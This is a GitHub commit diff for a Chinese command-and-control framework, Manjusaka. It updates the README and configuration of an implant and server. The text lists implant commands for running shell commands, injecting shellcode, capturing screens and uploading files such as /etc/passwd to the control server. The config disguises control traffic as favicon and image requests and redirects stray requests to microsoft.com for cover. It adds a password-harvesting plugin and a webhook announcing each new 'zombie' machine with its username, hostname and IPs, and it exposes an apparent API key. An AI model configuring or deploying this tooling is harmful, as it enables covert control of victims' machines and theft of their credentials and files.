File tree Expand file tree Collapse file tree 12 files changed +5797
-2719
lines changed Expand file tree Collapse file tree 12 files changed +5797
-2719
lines changed Original file line number Diff line number Diff line change 37
37
38
38
新建项目 配置需要填写以下项:
39
39
40
- 项目名称: 随便写 hvv2022
40
+ 项目名称: 随便写 如: hvv2022
41
41
42
42
回调地址: 外网IP和端口 http://12.34.56.78:8080
43
43
44
44
上线域名: cdn域名 如果没有上cdn则填写和回调地址一样
45
45
46
- Host : cdn上线时所需要的host请求头
46
+ Host头 : cdn上线时所需要的host请求头
47
+
48
+ 代理地址: NPC上线时如果需要走代理,在这里配置。比如我测试用的clash,代理配置为http://192.168.93.1:7890
47
49
48
50
其它都会默认生成,点击确定更新之后需要刷新列表重新启用项目状态。
49
51
@@ -86,11 +88,12 @@ ls 枚举文件 eg: ls /
86
88
cd 切换目录 eg: cd /
87
89
sh 执行系统命令 eg: sh ps -aux , sh tasklist
88
90
cat 读取文本 cat a.txt
89
- screen 执行截屏 screen (可能会报毒。。待优化)
90
- wget 下载文件 eg: wget http://192.168.1.1/a.txt <a.txt> 文件名可选 默认当前
91
- start 执行插件可执行文件 eg: start name <args> 需要可执行文件在plugins目录下 会自动把插件传到目标机器上面
92
- pl 执行插件 eg: pl plugname <plugargs> 需要插件在plugins目录下
93
- inject 注入进程 eg: inject pid <shellcodeurl> shellcodeurl可选 默认下载当前shellcode下载链接
91
+ screen 执行截屏 screen
92
+ wget 下载文件 eg: wget http://192.168.1.1/a.txt <a.txt> 文件名可选 默认当前
93
+ put 上传文件 eg: put /etc/passwd 将passwd文件上传到nps服务器
94
+ start 执行插件可执行文件 eg: start name <args> 需要可执行文件在plugins目录下 会自动把插件传到目标机器上面
95
+ pl 执行插件 eg: pl plugname <plugargs> 需要插件在plugins目录下
96
+ inject 注入进程 eg: inject pid <shellcodeurl> shellcodeurl可选 默认下载当前shellcode下载链接
94
97
95
98
96
99
```
@@ -200,8 +203,15 @@ message PlugResult {
200
203
201
204
## 更新
202
205
203
- ### todo
206
+ ### v0.8
207
+ 1、获取真实公网地址、并展示IP归属 , 密码加密,上线提醒功能
208
+
209
+ 2、支持cdn上线,加入代理上线功能 修复host头问题
204
210
211
+ 3、默认获取所有历史npc上线列表
212
+
213
+ 4、修复其它bug
214
+
205
215
206
216
### v0.7
207
217
1、新增shellcode加载方式,新增系统位数区分
Original file line number Diff line number Diff line change @@ -9,7 +9,7 @@ npcport = ":80"
9
9
# NPU后台地址
10
10
npuaddr = " manjusaka"
11
11
12
- # 主交互路由,遵守gin路由规则 后端会读取target的值(最终url总长不能超64)
12
+ # 主交互路由,遵守gin路由规则 后端会读取target的值
13
13
npcroute = " /:target/favicon.ico"
14
14
15
15
# npc母体下载路由,遵守gin路由规则 后端会读取target目标、sys母体类型、type系统位数的值
@@ -18,6 +18,9 @@ downroute = "/:target/assert/:sys/:type/bg.jpg"
18
18
# 非法请求时的转发地址
19
19
redirect = " http://www.microsoft.com"
20
20
21
+ # nps调用tx接口获取ip归属 https://apis.map.qq.com/ws/location/v1/ip
22
+ qqmapkey = " EIMBZ-RBNH4-NZQUG-X7RKQ-3SPPH-YSFCX"
23
+
21
24
[fileservice ]
22
25
# 文件服务地址 默认开启本地服务
23
26
server = " "
@@ -28,3 +31,26 @@ route = "/images/:fid/logo.png"
28
31
# fid有效时间(秒)
29
32
fidtimeout = 3600
30
33
34
+
35
+ [plug .getpass ]
36
+ args = " all"
37
+
38
+
39
+ [webhook ] # 新上线机器时构造该hook
40
+ # 目前只支持POST
41
+ method = " POST"
42
+
43
+ url = " https://wxpusher.zjiecode.com/api/send/message"
44
+
45
+ headers = " Content-Type:application/json" # 多个header以\n分割
46
+
47
+ body = """ {
48
+ "appToken":"AT_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
49
+ "content":"{Projname} {Projroute} \\ n{Username} {Hostname} \\ n{Intranet} {Internet} \\ n{Pid} {Process}",
50
+ "summary":"您有新的肉鸡上线啦!{Username} {Hostname}",
51
+ "contentType":3,
52
+ "uids":["UID_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"]}"""
53
+
54
+
55
+
56
+
Load Diff Large diffs are not rendered by default.
You can’t perform that action at this time.
0 commit comments